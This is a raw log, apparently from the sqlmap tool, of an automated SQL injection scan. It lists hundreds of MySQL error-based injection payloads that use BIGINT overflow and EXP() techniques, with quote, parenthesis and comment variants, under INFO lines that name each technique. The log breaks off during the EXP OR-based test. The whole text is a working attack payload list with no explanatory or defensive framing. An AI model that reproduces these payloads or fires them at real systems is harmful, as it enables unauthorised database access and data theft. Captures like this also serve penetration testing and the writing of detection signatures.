[10:59:23] [PAYLOAD] 1212`=`1212` AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND `1212`=`1212
[10:59:23] [PAYLOAD] 1212"="1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "1212"="1212
[10:59:23] [PAYLOAD] 1212]-(SELECT 0 WHERE 5222=5222 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))|[1212
[10:59:23] [PAYLOAD] 1212' IN BOOLEAN MODE) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))#
[10:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:59:23] [PAYLOAD] 1212) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- eHsJ
[10:59:23] [PAYLOAD] 1212') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- FKsA
[10:59:23] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ktbn
[10:59:23] [PAYLOAD] 1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VvRM
[10:59:23] [PAYLOAD] 1212) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (3398=3398
[10:59:24] [PAYLOAD] 1212)) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((3814=3814
[10:59:24] [PAYLOAD] 1212))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (((5248=5248
[10:59:24] [PAYLOAD] 1212 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))
[10:59:24] [PAYLOAD] 1212') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('xuod'='xuod
[10:59:24] [PAYLOAD] 1212')) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('FSpV'='FSpV
[10:59:24] [PAYLOAD] 1212'))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('bUnR'='bUnR
[10:59:24] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'UBMd'='UBMd
[10:59:24] [PAYLOAD] 1212') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('EYop' LIKE 'EYop
[10:59:24] [PAYLOAD] 1212')) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('SoIS' LIKE 'SoIS
[10:59:24] [PAYLOAD] 1212'))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('IHow' LIKE 'IHow
[10:59:24] [PAYLOAD] 1212%' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'ySVh%'='ySVh
[10:59:24] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HgKu' LIKE 'HgKu
[10:59:24] [PAYLOAD] 1212") OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("plzf"="plzf
[10:59:24] [PAYLOAD] 1212")) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("SjTI"="SjTI
[10:59:24] [PAYLOAD] 1212"))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("yJFY"="yJFY
[10:59:24] [PAYLOAD] 1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "cBIl"="cBIl
[10:59:24] [PAYLOAD] 1212") OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("JnfY" LIKE "JnfY
[10:59:24] [PAYLOAD] 1212")) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("YwFb" LIKE "YwFb
[10:59:24] [PAYLOAD] 1212"))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("uuAr" LIKE "uuAr
[10:59:24] [PAYLOAD] 1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "ZVUh" LIKE "ZVUh
[10:59:24] [PAYLOAD] 1212 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- URjc
[10:59:24] [PAYLOAD] 1212 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))# cnbU
[10:59:24] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) OR 'yjrt'='BGGw
[10:59:24] [PAYLOAD] 1212') WHERE 7040=7040 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- MbMa
[10:59:24] [PAYLOAD] 1212") WHERE 7288=7288 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- LEOr
[10:59:24] [PAYLOAD] 1212) WHERE 3994=3994 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- fBhK
[10:59:24] [PAYLOAD] 1212' WHERE 8509=8509 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ERyK
[10:59:24] [PAYLOAD] 1212" WHERE 9961=9961 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- brOD
[10:59:24] [PAYLOAD] 1212 WHERE 2117=2117 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- XtUG
[10:59:24] [PAYLOAD] 1212'||(SELECT 0x4b534c51 WHERE 1863=1863 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:24] [PAYLOAD] 1212'||(SELECT 0x65786e7a FROM DUAL WHERE 4445=4445 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:24] [PAYLOAD] 1212'+(SELECT 0x4472716d WHERE 3338=3338 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+'
[10:59:24] [PAYLOAD] 1212||(SELECT 0x436a6946 FROM DUAL WHERE 5061=5061 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:24] [PAYLOAD] 1212||(SELECT 0x4f506853 WHERE 1174=1174 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:24] [PAYLOAD] 1212+(SELECT MWyF WHERE 2479=2479 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:24] [PAYLOAD] 1212+(SELECT 0x45794a6a WHERE 7185=7185 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:24] [PAYLOAD] 1212')) AS oKJi WHERE 6844=6844 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- uTvw
[10:59:24] [PAYLOAD] 1212")) AS jewH WHERE 8659=8659 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- KlWx
[10:59:24] [PAYLOAD] 1212)) AS baoy WHERE 3983=3983 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- cJta
[10:59:24] [PAYLOAD] 1212') AS yBfV WHERE 2680=2680 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ldSl
[10:59:24] [PAYLOAD] 1212") AS MkoI WHERE 2970=2970 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- hqHv
[10:59:24] [PAYLOAD] 1212) AS Vboz WHERE 1917=1917 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- kSBP
[10:59:24] [PAYLOAD] 1212` WHERE 7433=7433 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- AeNp
[10:59:24] [PAYLOAD] 1212`) WHERE 1262=1262 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- DRsN
[10:59:24] [PAYLOAD] 1212`=`1212` OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND `1212`=`1212
[10:59:24] [PAYLOAD] 1212"="1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "1212"="1212
[10:59:24] [PAYLOAD] 1212]-(SELECT 0 WHERE 8877=8877 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))|[1212
[10:59:24] [PAYLOAD] 1212' IN BOOLEAN MODE) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))#
[10:59:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:59:24] [PAYLOAD] 1212) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- brDS
[10:59:24] [PAYLOAD] 1212') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- dofK
[10:59:24] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- jfSf
[10:59:24] [PAYLOAD] 1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- yZLB
[10:59:24] [PAYLOAD] 1212) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (6729=6729
[10:59:24] [PAYLOAD] 1212)) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((7602=7602
[10:59:24] [PAYLOAD] 1212))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (((6440=6440
[10:59:24] [PAYLOAD] 1212 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))
[10:59:24] [PAYLOAD] 1212') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ('Fiqe'='Fiqe
[10:59:24] [PAYLOAD] 1212')) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (('NsXY'='NsXY
[10:59:25] [PAYLOAD] 1212'))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((('QHXU'='QHXU
[10:59:25] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND 'vTnf'='vTnf
[10:59:25] [PAYLOAD] 1212') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ('aDIC' LIKE 'aDIC
[10:59:25] [PAYLOAD] 1212')) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (('GEdp' LIKE 'GEdp
[10:59:25] [PAYLOAD] 1212'))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((('mvPp' LIKE 'mvPp
[10:59:25] [PAYLOAD] 1212%' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND 'HbNz%'='HbNz
[10:59:25] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND 'ujrW' LIKE 'ujrW
[10:59:25] [PAYLOAD] 1212") AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ("iCNw"="iCNw
[10:59:25] [PAYLOAD] 1212")) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (("vsdz"="vsdz
[10:59:25] [PAYLOAD] 1212"))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((("oFuc"="oFuc
[10:59:25] [PAYLOAD] 1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND "zKht"="zKht
[10:59:25] [PAYLOAD] 1212") AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ("SzTh" LIKE "SzTh
[10:59:25] [PAYLOAD] 1212")) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (("DbrT" LIKE "DbrT
[10:59:25] [PAYLOAD] 1212"))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((("jkyk" LIKE "jkyk
[10:59:25] [PAYLOAD] 1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND "DjBZ" LIKE "DjBZ
[10:59:25] [PAYLOAD] 1212 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- YjfK
[10:59:25] [PAYLOAD] 1212 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))# ILdB
[10:59:25] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) OR 'YGxg'='fzEz
[10:59:25] [PAYLOAD] 1212') WHERE 1286=1286 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- UCUr
[10:59:25] [PAYLOAD] 1212") WHERE 4110=4110 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- YCqM
[10:59:25] [PAYLOAD] 1212) WHERE 2322=2322 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- tmnY
[10:59:25] [PAYLOAD] 1212' WHERE 3935=3935 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- HjBU
[10:59:25] [PAYLOAD] 1212" WHERE 1576=1576 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- VhAz
[10:59:25] [PAYLOAD] 1212 WHERE 9239=9239 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- iWRD
[10:59:25] [PAYLOAD] 1212'||(SELECT 0x61546e6f WHERE 5499=5499 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||'
[10:59:25] [PAYLOAD] 1212'||(SELECT 0x744f5070 FROM DUAL WHERE 9481=9481 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||'
[10:59:25] [PAYLOAD] 1212'+(SELECT 0x5372674a WHERE 4563=4563 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))+'
[10:59:25] [PAYLOAD] 1212||(SELECT 0x44646378 FROM DUAL WHERE 4257=4257 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||
[10:59:25] [PAYLOAD] 1212||(SELECT 0x6763536d WHERE 6323=6323 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||
[10:59:25] [PAYLOAD] 1212+(SELECT hpjY WHERE 1260=1260 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))+
[10:59:25] [PAYLOAD] 1212+(SELECT 0x74454e54 WHERE 5249=5249 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))+
[10:59:25] [PAYLOAD] 1212')) AS ntQN WHERE 2274=2274 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- mocj
[10:59:25] [PAYLOAD] 1212")) AS lCvR WHERE 9002=9002 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- YwRI
[10:59:25] [PAYLOAD] 1212)) AS NMPh WHERE 4676=4676 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- ffEo
[10:59:25] [PAYLOAD] 1212') AS uhKy WHERE 2461=2461 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- RFoz
[10:59:25] [PAYLOAD] 1212") AS bEhQ WHERE 8480=8480 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- Cxuw
[10:59:25] [PAYLOAD] 1212) AS RbtX WHERE 2758=2758 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- bWAt
[10:59:25] [PAYLOAD] 1212` WHERE 3584=3584 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- nSJB
[10:59:25] [PAYLOAD] 1212`) WHERE 9010=9010 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- uYnz
[10:59:25] [PAYLOAD] 1212`=`1212` AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND `1212`=`1212
[10:59:25] [PAYLOAD] 1212"="1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND "1212"="1212
[10:59:25] [PAYLOAD] 1212]-(SELECT 0 WHERE 9392=9392 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))|[1212
[10:59:25] [PAYLOAD] 1212' IN BOOLEAN MODE) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))#
[10:59:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:59:25] [PAYLOAD] 1212) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- qPqi
[10:59:25] [PAYLOAD] 1212') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- iKpD
[10:59:25] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- XdBc
[10:59:25] [PAYLOAD] 1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- aiNL
[10:59:25] [PAYLOAD] 1212) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (8945=8945
[10:59:25] [PAYLOAD] 1212)) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((9736=9736
[10:59:25] [PAYLOAD] 1212))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (((6647=6647
[10:59:25] [PAYLOAD] 1212 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))
[10:59:25] [PAYLOAD] 1212') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ('UzOm'='UzOm
[10:59:25] [PAYLOAD] 1212')) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (('JNoG'='JNoG
[10:59:25] [PAYLOAD] 1212'))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((('lvRU'='lvRU
[10:59:25] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND 'MirD'='MirD
[10:59:25] [PAYLOAD] 1212') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ('whuz' LIKE 'whuz
[10:59:25] [PAYLOAD] 1212')) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (('HaZN' LIKE 'HaZN
[10:59:25] [PAYLOAD] 1212'))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((('BCem' LIKE 'BCem
[10:59:25] [PAYLOAD] 1212%' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND 'PMiK%'='PMiK
[10:59:25] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND 'qWQF' LIKE 'qWQF
[10:59:26] [PAYLOAD] 1212") OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ("IxnD"="IxnD
